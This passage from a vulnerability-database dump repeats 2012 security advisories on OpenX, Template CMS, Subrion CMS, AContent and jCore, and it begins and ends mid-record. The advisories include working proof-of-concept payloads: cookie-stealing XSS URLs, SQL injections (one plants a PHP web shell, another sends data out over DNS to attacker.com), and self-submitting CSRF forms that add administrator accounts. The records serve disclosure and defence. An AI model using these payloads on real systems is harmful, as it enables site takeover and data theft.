\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2012-10-22T00:00:00", "title": "Multiple vulnerabilities in jCore", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:46", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2012-4232", "CVE-2012-4231"], "modified": "2012-10-22T00:00:00", "id": "SECURITYVULNS:DOC:28648", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28648", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:46", "references": [], "description": "\r\n\r\nAdvisory ID: HTB23116\r\nProduct: OpenX\r\nVendor: OpenX\r\nVulnerable Version(s): 2.8.10 and probably prior\r\nTested Version: 2.8.10\r\nVendor Notification: September 19, 2012 \r\nPublic Disclosure: October 10, 2012 \r\nVulnerability Type: Cross-Site Scripting [CWE-79], SQL Injection [CWE-89]\r\nCVE References: CVE-2012-4989, CVE-2012-4990\r\nCVSSv2 Base Scores: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N), 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nRisk Level: Medium \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenX, which can be exploited to perform Cross-Site Scripting (XSS) and SQL Injection attacks.\r\n\r\n\r\n1) Cross-Site Scripting (XSS) in OpenX: CVE-2012-4989\r\n\r\nInput passed via the "parent" GET parameter to /www/admin/plugin-index.php is not properly sanitised before being returned to the user.\r\nThis can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of an affected website.\r\n\r\nThe following PoC (Proof of Concept) demonstrates the vulnerability:\r\n\r\nhttp://[host]/www/admin/plugin-index.php?action=info&group=vastInlineBannerTypeHtml&parent=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\n\r\n\r\n2) SQL Injection in OpenX: CVE-2012-4990\r\n\r\nInput passed via the "ids[]" POST parameter to /www/admin/campaign-zone-link.php is not properly sanitised before being used in SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability: \r\n\r\n\r\n<form action="http://[host]/www/admin/campaign-zone-link.php" method="post">\r\n<input type="hidden" name="action" value='link' />\r\n<input type="hidden" name="ids[]" value="z1)) OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- " />\r\n<input type="hidden" name="clientid" value='[CLIENT_ID]' />\r\n<input type="hidden" name="campaignid" value='[CAMPAIGN_ID]' />\r\n<input type="hidden" name="" value='' />\r\n<input type="hidden" name="" value='' />\r\n<input type="hidden" name="" value='' />\r\n<input type="hidden" name="" value='' />\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\nSuccessful exploitation of this vulnerability requires attacker to be registered, logged-in and have permission to access link zone.\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nFixed in SVN repository, revision 81823\r\n\r\nReplace next files:\r\n[CWE-79] https://svn.openx.org/openx/trunk/lib/templates/admin/plugin-group-view.html\r\n[CWE-89] https://svn.openx.org/openx/trunk/www/admin/campaign-zone-link.php\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23116 - https://www.htbridge.com/advisory/HTB23116 - Multiple vulnerabilities in OpenX.\r\n[2] OpenX - http://www.openx.com - Open source ad serving platform for publishers.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2012-10-22T00:00:00", "title": "Multiple vulnerabilities in OpenX", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:46", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2012-4990", "CVE-2012-4989"], "modified": "2012-10-22T00:00:00", "id": "SECURITYVULNS:DOC:28649", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28649", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:46", "references": [], "description": "\r\n\r\nAdvisory ID: HTB23115\r\nProduct: Template CMS\r\nVendor: template-cms.ru\r\nVulnerable Version(s): 2.1.1 and probably prior\r\nTested Version: 2.1.1\r\nVendor Notification: September 12, 2012 \r\nPublic Disclosure: October 3, 2012 \r\nVulnerability Type: Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352]\r\nCVE References: CVE-2012-4901, CVE-2012-4902\r\nCVSSv2 Base Scores: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Template CMS, which can be exploited to perform Cross-Site Scripting (XSS) and \u0421ross-Site Request Forgery (CSRF) attacks.\r\n\r\n\r\n1) Cross-Site Scripting (XSS) in Template CMS: CVE-2012-4901\r\n\r\nInput passed via the "themes_editor" POST parameter to /admin/index.php is not properly sanitised before being returned to the user.\r\nThis can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of an affected website.\r\n\r\n\r\nThe following PoC (Proof of Concept) demonstrates the vulnerability:\r\n\r\n\r\n<form action="http://[host]/admin/index.php?action=add_template&id=themes" method="post">\r\n<input type="hidden" name="themes_editor" value='</textarea><script>alert(document.cookie);</script>' />\r\n<input type="hidden" name="themes_editor_name" value='' />\r\n<input type="hidden" name="add_template" value='' />\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n\r\n2) \u0421ross-Site Request Forgery (CSRF) in Template CMS: CVE-2012-4902\r\n\r\nThe application allows authorized administrator to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests. This can be exploited to add, delete or modify sensitive information, for example to create new administrator or execute arbitrary PHP code.\r\n\r\nAn attacker has to trick a logged-in administrator to visit a malicious web page containing the following code that will add a new administrator to the CMS:\r\n\r\n\r\n<form action="http://[host]/admin/index.php?id=system&sub_id=users&action=add" method="post">\r\n<input type="hidden" name="login" value='newadmin' />\r\n<input type="hidden" name="password" value='password' />\r\n<input type="hidden" name="email" value='newadmin@mail.com' />\r\n<input type="hidden" name="role" value='admin' />\r\n<input type="hidden" name="register" value='' />\r\n<input type="submit" id="btn">\r\n</form>\r\n<script>\r\ndocument.getElementById('btn').click();\r\n</script>\r\n\r\n\r\n\r\nThe second PoC adds arbitrary PHP code (phpinfo() in our case) into CMS's page: \r\n\r\n\r\n<form action="http://[host]/admin/index.php?id=themes&action=edit_template&file=aboutTemplate.php" method="post">\r\n<input type="hidden" name="themes_editor_name" value='about' />\r\n<input type="hidden" name="themes_editor" value='<? phpinfo(); ?>' />\r\n<input type="hidden" name="old_name" value="about" />\r\n<input type="hidden" name="edit_template" value='' />\r\n<input type="submit" id="btn">\r\n</form>\r\n<script>\r\ndocument.getElementById('btn').click();\r\n</script>\r\n\r\n\r\nThe phpinfo() function will be executed [if allowed by web server configuration] on the following web page:\r\n\r\nhttp://[vulnerable_host]/about\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23115 - https://www.htbridge.com/advisory/HTB23115 - Multiple vulnerabilities in Template CMS.\r\n[2] Template CMS - http://template-cms.ru - Template CMS is a fast and simple content management system written in PHP.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2012-10-22T00:00:00", "title": "Multiple vulnerabilities in Template CMS", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:46", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2012-4901", "CVE-2012-4902"], "modified": "2012-10-22T00:00:00", "id": "SECURITYVULNS:DOC:28650", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28650", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "htbridge": [{"lastseen": "2017-06-23T23:08:20", "_object_types": ["robots.models.base.Bulletin", "robots.models.htbridge.HTBridgeBulletin"], "references": [], "description": "High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Subrion CMS, which can be exploited to perform Cross-Site Scripting (XSS), SQL Injection and \u0421ross-Site Request Forgery (CSRF) attacks. \n \n1) SQL Injection in Subrion CMS: CVE-2012-4772 \nInput passed via the \"plan_id\" POST parameter to /register/ URL (modified by mod_rewrite to /system.php script) is not properly sanitised before being used in SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \nThe following PoC (Proof of Concept) demonstrates the vulnerability: \n<form action=\"http://[host]/register/\" method=\"post\"> \n<input type=\"hidden\" name=\"username\" value='username' /> \n<input type=\"hidden\" name=\"fullname\" value='fullname' /> \n<input type=\"hidden\" name=\"email\" value='username@mail.com' /> \n<input type=\"hidden\" name=\"password\" value='password' /> \n<input type=\"hidden\" name=\"password2\" value='password' /> \n<input type=\"hidden\" name=\"security_code\" value='[CAPTCHA]' /> \n<input type=\"hidden\" name=\"plan_id\" value=\"0 UNION SELECT '<? system($cmd); ?>',1,1,1,1,1,1,1,1,1,1,1,1,1 INTO OUTFILE '../../../path/to/site/file.php'\" /> \n<input type=\"hidden\" name=\"register\" value=\"\" /> \n<input type=\"submit\" id=\"btn\"> \n</form> \nDepending on web and SQL servers configuration, the above-mentioned PoC code creates a simple PHP shell on the vulnerable system. \n \n2) Cross-Site Scripting (XSS) in Subrion CMS: CVE-2012-4771 \n2.1 Input passed via the \"f[accounts][fullname]\" and \"f[accounts][username]\" GET parameters to /advsearch/ URL (modified by mod_rewrite to /system.php script) is not properly sanitised before being returned to the user. \nThis can be exploited to execute arbitrary HTML and script code in user's browser session in context of an affected website. \nThe following PoC demonstrates the vulnerability: \n<form action=\"http://[host]/advsearch/\" method=\"post\"> \n<input type=\"hidden\" name=\"items[]\" value='accounts' /> \n<input type=\"hidden\" name=\"f[accounts][fullname]\" value='\"><script>alert(document.cookie);</script>' /> \n<input type=\"hidden\" name=\"f[accounts][username]\" value='\"><script>alert(document.cookie);</script>' /> \n<input type=\"hidden\" name=\"q\" value='' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n2.2 Input passed via the \"id\" and \"group\" GET parameters to multiple files is not properly sanitised before being returned to the user. \nThis can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of an affected website. \nThe following PoCs demonstrate the vulnerabilities: \nhttp://[host]/admin/accounts/edit/?id=1%22%3E%3Cscript%3Ealert%28document.co okie%29;%3C/script%3E \nhttp://[host]/admin/configuration/?group=1%22%3E%3Cscript%3Ealert%28document .cookie%29;%3C/script%3E \nhttp://[host]/admin/manage/fields/edit/?id=1%22%3E%3Cscript%3Ealert%28docume nt.cookie%29;%3C/script%3E \nhttp://[host]/admin/manage/blocks/edit/?id=1%22%3E%3Cscript%3Ealert%28docume nt.cookie%29;%3C/script%3E \n \n3) \u0421ross-Site Request Forgery (CSRF) in Subrion CMS: CVE-2012-4773 \nThe application allows authorized administrator to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests. This can be exploited to add, delete or modify sensitive information, for example to create new administrator or execute arbitrary SQL code. \nAn attacker should make logged-in administrator open a malicious link in the browser to exploit this vulnerability. \nThe following PoC creates administrative account within application: \n<form action=\"http://[host]/admin/accounts/add/\" method=\"post\"> \n<input type=\"hidden\" name=\"username\" value='new_admin' /> \n<input type=\"hidden\" name=\"fullname\" value='new_admin' /> \n<input type=\"hidden\" name=\"email\" value='new_admin@mail.com' /> \n<input type=\"hidden\" name=\"usergroup\" value='1' /> \n<input type=\"hidden\" name=\"status\" value='active' /> \n<input type=\"hidden\" name=\"_password\" value='_password' /> \n<input type=\"hidden\" name=\"_password2\" value='_password' /> \n<input type=\"hidden\" name=\"save\" value=\"Add\" /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.getElementById('btn').click(); \n</scr ipt>\n", "reporter": "High-Tech Bridge", "published": "2012-09-05T00:00:00", "type": "htbridge", "title": "Multiple vulnerabilities in Subrion CMS", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Subrion CMS", "version": "2.2.1", "operator": "le"}], "cvelist": ["CVE-2012-4771", "CVE-2012-4772", "CVE-2012-4773"], "_object_type": "robots.models.htbridge.HTBridgeBulletin", "modified": "2012-10-15T00:00:00", "id": "HTB23113", "href": "https://www.htbridge.com/advisory/HTB23113", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P/"}}, {"lastseen": "2017-06-23T23:08:16", "_object_types": ["robots.models.base.Bulletin", "robots.models.htbridge.HTBridgeBulletin"], "references": [], "description": "High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in AContent, which can be exploited to bypass authentication and to perform Cross-Site Scripting (XSS) and SQL Injection attacks. \n \n1) SQL Injection in AContent: CVE-2012-5167 \n1.1 The vulnerability exists due to insufficient sanitation of input data in the \"field\" HTTP POST parameter in /course_category/index_inline_editor_submit.php. A remote unauthenticated user can execute arbitrary SQL commands in application`s database. \nThe following PoC (Proof of Concept) demonstrates the vulnerability: \n<form action=\"http://[host]/course_category/index_inline_editor_submit.php\" method=\"post\"> \n<input type=\"hidden\" name=\"field\" value=\"category_name-1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))\" /> \n<input type=\"hidden\" name=\"value\" value=\"1\" /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n1.2 The vulnerability exists due to insufficient sanitation of input data in the \"field\" HTTP POST parameter in /user/index_inline_editor_submit.php. A remote unauthenticated user can execute arbitrary SQL commands in application`s database. \nThe following PoC (Proof of Concept) demonstrates the vulnerability: \n<form action=\"http://[host]/user/index_inline_editor_submit.php\" method=\"post\"> \n<input type=\"hidden\" name=\"field\" value=\"password=((select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))))-1\" /> \n<input type=\"hidden\" name=\"value\" value=\"1\" /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n1.3 Input passed via the \"id\" GET parameter to /user/user_password.php in POST request is not properly sanitised before being used in SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \nThe following PoC (Proof of Concept) demonstrates the vulnerability: \n<form action=\"http://[host]/user/user_password.php?id=1' AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a%2b1)%252)))%20--%20\" method=\"post\"> \n<input type=\"hidden\" name=\"submit\" value=\"1\" /> \n<input type=\"submit\" id=\"btn\"> \n</form> \nSuccessful exploitation of vulnerability 1.3 requires attacker to be registered and logged-in. \n \n2) Improper Authentication in AContent: CVE-2012-5168 \n2.1 The vulnerability exists due to absent authentication in the \"/user/index_inline_editor_submit.php\" script. A remote unauthorized attacker can change users' passwords. \nThe following example will change password for user with id=1 to 'password'. \n<form action=\"http://[host]/user/index_inline_editor_submit.php\" method=\"post\"> \n<input type=\"hidden\" name=\"field\" value=\"password-1\" /> \n<input type=\"hidden\" name=\"value\" value=\"5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8\" /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n2.2 The vulnerability exists due to absent authentication in the \"/course_category/index_inline_editor_submit.php\" script. A remote unauthorized attacker can modify names for existing categories. \nThe following example will change category name with id=1 to 'new_category': \n<form action=\"http://[host]/course_category/index_inline_editor_submit.php\" method=\"post\"> \n<input type=\"hidden\" name=\"field\" value=\"category_name-1\" /> \n<input type=\"hidden\" name=\"value\" value=\"new_category\" /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n3) Cross-Site Scripting (XSS) in AContent: CVE-2012-5169 \nInput passed via the HTTP GET parameters \"pathext\", \"popup\", \"framed\", and \"file\" to /file_manager/preview_top.php is not properly sanitised before being returned to the user. \nThis can be exploited to execute arbitrary HTML and script code in user's browser session in context of an affected website. \nThe following PoCs (Proof of Concept) demonstrate the vulnerabilities: \nhttp://[host]/file_manager/preview_top.php?pathext=%22%3E%3Cscript%3Ealert%2 8document.cookie%29;%3C/script%3E \nhttp://[host]/file_manager/preview_top.php?popup=%22%3E%3Cscript%3Ealert%28d ocument.cookie%29;%3C/script%3E \nhttp://[host]/file_manager/preview_top.php?framed=%22%3E%3Cscript%3Ealert%28 document.cookie%29;%3C/script%3E \nhttp://[host]/file_manager/preview_top.php?file=%22%3E%3Cscript%3Ealert%28do cument.cookie%29;%3C/script%3E \n\n", "reporter": "High-Tech Bridge", "published": "2012-09-26T00:00:00", "type": "htbridge", "title": "Multiple vulnerabilities in AContent", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "AContent", "version": "1.2", "operator": "le"}], "cvelist": ["CVE-2012-5167", "CVE-2012-5168", "CVE-2012-5169"], "_object_type": "robots.models.htbridge.HTBridgeBulletin", "modified": "2012-10-12T00:00:00", "id": "HTB23117", "href": "https://www.htbridge.com/advisory/HTB23117", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P/"}}, {"lastseen": "2017-06-23T23:08:30", "_object_types": ["robots.models.base.Bulletin", "robots.models.htbridge.HTBridgeBulletin"], "references": [], "description": "High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in jCore, which can be exploited to perform Cross-Site Scripting (XSS) and SQL Injection attacks. \n \n1) SQL Injection in jCore: CVE-2012-4232 \n1.1 Input passed via the \"memberloginid\" COOKIE parameter to /admin/index.php is not properly sanitised before being used in SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \nGET /admin/?logout=1 HTTP/1.1 \nCookie: memberloginid=' OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107) ,CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102 ),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \n \n2) Cross-Site Scripting (XSS) in jCore: CVE-2012-4231 \n2.1 Input passed via the \"path\" GET parameter to /admin/index.php is not properly sanitised before being returned to the user. \nThis can be exploited to execute arbitrary HTML and script code in user's browser session in context of affected website. \nThe following PoC demonstrates the vulnerability: \nhttp://[host]/admin/?path=%27%20onmouseover%3dalert%28document.cookie%29%20% 27\n", "reporter": "High-Tech Bridge", "published": "2012-08-01T00:00:00", "type": "htbridge", "title": "Multiple vulnerabilities in jCore", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "jCore", "version": "1.0pre", "operator": "le"}], "cvelist": ["CVE-2012-4232", "CVE-2012-4231"], "_object_type": "robots.models.htbridge.HTBridgeBulletin", "modified": "2012-08-13T00:00:00", "id": "HTB23107", "href": "https://www.htbridge.com/advisory/HTB23107", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P/"}}, {"lastseen": "2017-06-23T23:08:15", "_object_types": ["robots.models.base.Bulletin", "robots.models.htbridge.HTBridgeBulletin"], "references": [], "description": "High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenX, which can be exploited to perform Cross-Site Scripting (XSS) and SQL Injection attacks. \n \n1) Cross-Site Scripting (XSS) in OpenX: CVE-2012-4989 \nInput passed via the \"parent\" GET parameter to /www/admin/plugin-index.php is not properly sanitised before being returned to the user. \nThis can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of an affected website. \nThe following PoC (Proof of Concept) demonstrates the vulnerability: \nhttp://[host]/www/admin/plugin-index.php?action=info&group=vastInlineBannerT ypeHtml&parent=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \n \n2) SQL Injection in OpenX: CVE-2012-4990 \nInput passed via the \"ids[]\" POST parameter to /www/admin/campaign-zone-link.php is not properly sanitised before being used in SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \nThe following PoC demonstrates the vulnerability: \n<form action=\"http://[host]/www/admin/campaign-zone-link.php\" method=\"post\"> \n<input type=\"hidden\" name=\"action\" value='link' /> \n<input type=\"hidden\" name=\"ids[]\" value=\"z1)) OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \" /> \n<input type=\"hidden\" name=\"clientid\" value='[CLIENT_ID]' /> \n<input type=\"hidden\" name=\"campaignid\" value='[CAMPAIGN_ID]' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \nSuccessful exploitation of this vulnerability requires attacker to be registered, logged-in and have permission to access link zone. \n\n", "reporter": "High-Tech Bridge", "published": "2012-09-19T00:00:00", "type": "htbridge", "title": "Multiple vulnerabilities in OpenX", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "OpenX", "version": "2.8.10", "operator": "le"}], "cvelist": ["CVE-2012-4990", "CVE-2012-4989"], "_object_type": "robots.models.htbridge.HTBridgeBulletin", "modified": "2012-09-28T00:00:00", "id": "HTB23116", "href": "https://www.htbridge.com/advisory/HTB23116", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P/"}}, {"lastseen": "2017-06-23T23:08:27", "_object_types": ["robots.models.base.Bulletin", "robots.models.htbridge.HTBridgeBulletin"], "references": [], "description": "High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Template CMS, which can be exploited to perform Cross-Site Scripting (XSS) and \u0421ross-Site Request Forgery (CSRF) attacks. \n \n1) Cross-Site Scripting (XSS) in Template CMS: CVE-2012-4901 \nInput passed via the \"themes_editor\" POST parameter to /admin/index.php is not properly sanitised before being returned to the user. \nThis can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of an affected website. \n \nThe following PoC (Proof of Concept) demonstrates the vulnerability: \n<form action=\"http://[host]/admin/index.php?action=add_template&id=themes\" method=\"post\"> \n<input type=\"hidden\" name=\"themes_editor\" value='</textarea><script>alert(document.cookie);</script>' /> \n<input type=\"hidden\" name=\"themes_editor_name\" value='' /> \n<input type=\"hidden\" name=\"add_template\" value='' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n2) \u0421ross-Site Request Forgery (CSRF) in Template CMS: CVE-2012-4902 \nThe application allows authorized administrator to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests. This can be exploited to add, delete or modify sensitive information, for example to create new administrator or execute arbitrary PHP code. \nAn attacker has to trick a logged-in administrator to visit a malicious web page containing the following code that will add a new administrator to the CMS: \n<form action=\"http://[host]/admin/index.php?id=system&sub_id=users&action=add\" method=\"post\"> \n<input type=\"hidden\" name=\"login\" value='newadmin' /> \n<input type=\"hidden\" name=\"password\" value='password' /> \n<input type=\"hidden\" name=\"email\" value='newadmin@mail.com' /> \n<input type=\"hidden\" name=\"role\" value='admin' /> \n<input type=\"hidden\" name=\"register\" value='' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.getElementById('btn').click(); \n</scr ipt> \n \nThe second PoC adds arbitrary PHP code (phpinfo() in our case) into CMS's page: \n<form action=\"http://[host]/admin/index.php?id=themes&action=edit_template&file=ab outTemplate.php\" method=\"post\"> \n<input type=\"hidden\" name=\"themes_editor_name\" value='about' /> \n<input type=\"hidden\" name=\"themes_editor\" value='<? phpinfo(); ?>' /> \n<input type=\"hidden\" name=\"old_name\" value=\"about\" /> \n<input type=\"hidden\" name=\"edit_template\" value='' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.getElementById('btn').click(); \n</scr ipt> \nThe phpinfo() function will be executed [if allowed by web server configuration] on the following web page: \nhttp://[vulnerable_host]/about\n", "reporter": "High-Tech Bridge", "published": "2012-09-12T00:00:00", "type": "htbridge", "title": "Multiple vulnerabilities in Template CMS", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Template CMS", "version": "2.1.1", "operator": "le"}], "cvelist": ["CVE-2012-4901", "CVE-2012-4902"], "_object_type": "robots.models.htbridge.HTBridgeBulletin", "modified": "2012-09-12T00:00:00", "id": "HTB23115", "href": "https://www.htbridge.com/advisory/HTB23115", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C/"}}], "exploitdb": [{"lastseen": "2016-02-02T18:06:38", "osvdbidlist": ["85996", "86421", "85999"], "references": [], "edition": 1, "description": "subrion CMS 2.2.1 - Multiple Vulnerabilities. CVE-2012-4771,CVE-2012-4772,CVE-2012-4773,CVE-2012-5452. Webapps exploit for php platform", "reporter": "High-Tech Bridge SA", "published": "2012-10-22T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "subrion CMS 2.2.1 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-4771", "CVE-2012-4772", "CVE-2012-5452", "CVE-2012-4773"], "modified": "2012-10-22T00:00:00", "id": "EDB-ID:22159", "href": "https://www.exploit-db.com/exploits/22159/", "sourceData": "Advisory ID: HTB23113\r\nProduct: Subrion CMS\r\nVendor: The Subrion development team\r\nVulnerable Version(s): 2.2.1 and probably prior\r\nTested Version: 2.2.1\r\nVendor Notification: September 5, 2012 \r\nPublic Disclosure: October 17, 2012 \r\nVulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352]\r\nCVE References: CVE-2012-4771, CVE-2012-4772, CVE-2012-4773\r\nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Subrion CMS, which can be exploited to perform Cross-Site Scripting (XSS), SQL Injection and \u0421ross-Site Request Forgery (CSRF) attacks.\r\n\r\n\r\n1) SQL Injection in Subrion CMS: CVE-2012-4772\r\n\r\nInput passed via the \"plan_id\" POST parameter to /register/ URL (modified by mod_rewrite to /system.php script) is not properly sanitised before being used in SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC (Proof of Concept) demonstrates the vulnerability:\r\n\r\n\r\n<form action=\"http://[host]/register/\" method=\"post\">\r\n<input type=\"hidden\" name=\"username\" value='username' />\r\n<input type=\"hidden\" name=\"fullname\" value='fullname' />\r\n<input type=\"hidden\" name=\"email\" value='username@mail.com' />\r\n<input type=\"hidden\" name=\"password\" value='password' />\r\n<input type=\"hidden\" name=\"password2\" value='password' />\r\n<input type=\"hidden\" name=\"security_code\" value='[CAPTCHA]' />\r\n<input type=\"hidden\" name=\"plan_id\" value=\"0 UNION SELECT '<? system($cmd); ?>',1,1,1,1,1,1,1,1,1,1,1,1,1 INTO OUTFILE '../../../path/to/site/file.php'\" />\r\n<input type=\"hidden\" name=\"register\" value=\"\" />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\nDepending on web and SQL servers configuration, the above-mentioned PoC code creates a simple PHP shell on the vulnerable system. \r\n\r\n\r\n2) Cross-Site Scripting (XSS) in Subrion CMS: CVE-2012-4771\r\n\r\n2.1 Input passed 